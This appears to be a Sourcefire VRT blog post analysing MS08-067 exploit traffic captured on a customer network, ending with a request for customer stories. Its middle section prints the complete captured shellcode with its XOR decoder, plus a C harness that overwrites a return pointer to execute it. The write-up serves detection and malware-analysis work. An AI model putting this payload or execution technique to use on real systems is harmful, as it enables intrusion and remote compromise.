While sifting through my e-mail this morning, I saw a note from one of Sourcefire's European employees, asking if the VRT could take a look at some PCAPs pulled from a customer sensor - they'd triggered the rules for MS08-067, and our guy didn't think that they were false positives. Always eager to get real-world feedback on how our rules were functioning, I agreed; a cursory look at them convinced me that they were in need of more in-depth analysis by someone who knew the vulnerability better than I did, so I sent them over to Lurene Grenier and Matt Olney, who were the primary analysts on that vulnerability (and who, along with Alain Zidouemba, produced the VRT whitepaper on the subject http://www.snort.org/vrt/docs/white_papers/ms08-067wp.pdf).

After verifying that the PCAPs did in fact have all of the triggering conditions for the vulnerability, Lurene dumped out the RPC stub data for examination - since, if this was an exploit, that's where the payload would live. Examining the raw hex of the payload, she noticed what appeared to be a simple decoder routine, so she took the data and put it into IDA Pro to confirm her theory. For those wishing to follow along at home, the process is simple:

  • Select a new file for disassembly using "File -> New"
  • Choose "Unknown File" from the "Various Files" tab, and then select the dump file
  • Stick with IDA's default options, and choose 32-bit disassembly mode
  • Move your cursor to the start of the area you want to examine, and then press "C" to begin disassembly

    With this done, Lurene's theory was immediately confirmed, as the first three lines of the disassembly were an XOR loop:
0040A005 xor byte ptr [ebx+0Eh], 85h0040A009 inc ebx0040A00A loop test+0xA005 (0040A005)

This simple XOR decoding routine is useful for defeating many automated malware-detection techniques, and at a cost of only seven bytes at the start of the shellcode, is a very practical technique that is commonly seen in live exploits in the wild.

Before running that loop to determine what the decoded payload contained, one additional bit of setup was necessary: the EBX register had to be populated with the data that was going to be XOR'd, since we didn't have the Windows Server Service populating it with the appropriate data for us. This was a fairly simple step - the offset was just the address immediately after the LOOP statement, minus the 0x0E that the XOR instruction used. With that calculated, a simple

mov ebx,offset test+0x9FFE (00409FFE)

populated the register nicely. For those who might be wondering about ECX - since the LOOP instruction uses it to determine when to halt operation and continue on to the next instruction - it wasn't necessary to set it explicitly, since our test environment happened populated it with a value large enough to decode the shellcode, and we really weren't interested in having those instructions executed on Lurene's system anyway.

Getting this to actually execute and do the decoding for us requires the following relatively simple C program:

char shellcode[] ="\xbb\xfe\x9f\x40\x00\x80\x73\x0E\x85\x43\xE2\xF9\x6C\x4E\x85\x85\x85\xDA\x6D\xD0""\x85\x85\x85\x0C\x46\xD5\xED\x0B\xCB\x8B\x69\x6D\xDA\x85\x85\x85\xB4\x4C\xE3\x3C""\xEA\xEB\xD4\xED\xF0\xF7\xE9\xE8\xD1\x7A\x55\xD5\xED\xB3\x9F\xAA\xF5\x6D\xC0\x85""\x85\x85\xB4\x4C\xD4\xD4\x08\xB2\xD3\x08\xF2\x89\xD3\xD4\x7A\x55\xD6\xED\x1D\x7B""\x0F\x8B\x6D\xA9\x85\x85\x85\xD4\xD2\x7A\x55\xD6\xED\x35\xCC\xA8\x5E\x6D\x98\x85""\x85\x85\xB4\x4C\xCC\xD4\x7A\x55\xD0\xD3\xE1\x24\xB5\x85\x85\x85\x0E\xC5\x89\x0E""\xF5\x99\x28\x0E\xED\x8D\x0C\x6D\xDB\xD8\x46\xD6\xD0\xD3\xD2\x0E\xE9\xA1\x9D\x0E""\xC0\xB9\x0E\xD1\x80\xFD\x84\x6F\x0E\xCF\x9D\x0E\xDF\xA5\x84\x6E\x66\xB0\xCC\x0E""\xB1\x0E\x84\x6B\xB4\x7A\x79\xB4\x45\x29\xBD\x65\xF1\x82\x44\x4A\x88\x84\x42\x6E""\x77\xBE\xF9\xA1\x91\xF0\x64\x0E\xDF\xA1\x84\x6E\xE3\x0E\x89\xCE\x0E\xDF\x99\x84""\x6E\x0E\x81\x0E\x84\x6D\x6C\x87\x85\x85\x85\xB4\x45\x0C\x6F\xDA\xDB\xD8\xDE\x46""\x6D\xB5\x7A\x7A\x7A\xFD\xAB\xE0\xFD\xE0\x85\x85\x85\x85\x85\x85\x85\xED\xF1\xF1""\xF5\xBF\xAA\xAA\xB4\xB5\xAB\xB7\xB5\xBC\xAB\xB0\xBC\xAB\xB0\xB7\xBF\xBD\xB0\xB3""\xB0\xAA\xFD\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85""\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85""\x85\x85\x85\x85\x85\xDD\x6B\xFC\x3A\xFB\xBE\x5A\xC4\xDD\x6D\xFE\x68\xDD\x8C\x6B""\x47\xA9\xEC\x68\x14\xE6\xDF\x6B\x41\x70\x44\x44\xFF\xCD\x75\x74\xF7\x71\x44\x42""\x68\xF2\xBB\x94\x97\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x41""\x00\x4F\x00\x48\x00\x4C\x00\x4D\x00\x58\x00\x59\x00\x08\x04\x02\x00\x61\x13\x00""\x01\x50\x49\x54\x48\x61\x13\x00\x01\x49\x46\x4A\x55\x4F\x55\x54\x45\x50\x55\x57""\x4B\x58\x4D\x57\x58\x55\x47\x48\x4D\x49\x45\x4B\x43\x59\x45\x4E\x42\x41\x51\x50""\x4C\x5A\x45\x44\x4E\x4F\x4F\x42\x47\x4D\x57\xBA\xB3\x3D\x85\xD5\x1B\xF8\x4A\xEB""\x62\x4D\x5A\x43\x54\x57\x4C\x48\x59\x57\x49\x00\x00\x00\x00\x9A\x01\x00\x00\x02""\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00\x00\x00\x01\x10\x00\x00\x00""\x00\x00\x00";void main() {        int *ret;                _asm {                  int 3        }                ret = &ret+2;        *ret = (int *) shellcode;        return;}

The shellcode portion above should be obvious, but the rest of the program is worth an overview. The simplest piece is the _asm statement, which tells the compiler that the data inside of the brackets is explicit Assembly code, to be inserted directly into the program at that point of execution. Here, the instruction int 3 is a breakpoint, which is handy for running this program in your debugger of choice.

The rest of the program becomes obvious once you think about the nature of the program's stack. At the time the breakpoint is hit, the stack looks like this (addresses approximate):

-----------------------------------| Return pointer to caller (libc) | 0x00800010|---------------------------------||      Saved EBP from caller      | 0x0080000C|---------------------------------||      local variable (*ret)      | 0x00800008|---------------------------------||             ...                 | 0x00800004-----------------------------------

Thus, the line

ret = &ret+2;

initially sets the value of ret to 0x00800008 - i.e. the location of the variable ret on the stack - and then adds 2 to that value. Since ret is declared as a pointer to an int, and we're on a 32-bit platform, the compiler actually takes sizeof(int), otherwise known as 4, and multiplies that by 2 before doing the addition. This results in the value of ret being 0x00800010 - the location of the return pointer to libc. That allows the next line of the program:

*ret = (int *) shellcode;

to replace the return pointer with the address of the start of the shellcode (for anyone who's curious, as a global variable, char shellcode[] lives above the stack drawn above). By doing this, when the program returns out of main, the operating system will begin executing the instructions at the start of the shellcode block, and thus head directly into the decoder routine Lurene identified.

As you can see from the screenshots below, the decoder routine took what appeared to be a group of relatively random, harmless instructions:

and transformed them into a series of relative and register-based calls, one of the hallmarks of shellcode (such calls allow an attacker to call into code they control, instead of relying on fixed addresses within the operating system):

With this new knowledge in hand, I replied to my colleague who had sent over the PCAPs, and confirmed that these were indeed true positives, and malicious ones at that. My e-mail was apologetic, since I was the bearer of bad news - after all, who wants to tell someone they've been owned?

Much to my surprise, the e-mail I got in reply was extremely pleased. As it turns out, the customer - a large French manufacturing company - had seen an outbreak of this malicious traffic on their worldwide network that morning. However, the traffic was unable to penetrate inside of their core network in France, since they'd enabled the Sourcefire rules for MS08-067 in drop mode, and their IPS was busy blocking each and every attack attempt on segment of their network - like a modern-day Maginot Line that actually worked.

The whole thing was quite gratifying, since we always like to hear that our rules work in the wild as well as they do here in the VRT lab. That in mind, we're always eager to hear how people are actually using the VRT rules in production situations - it helps us prioritize our response to the threat landscape - so if you've got a story you're willing to share about how you're using our stuff, drop us a line at research@sourcefire.com. Depending on the quality and number of stories we get, Snort swag may be distributed to those who send us the best stuff.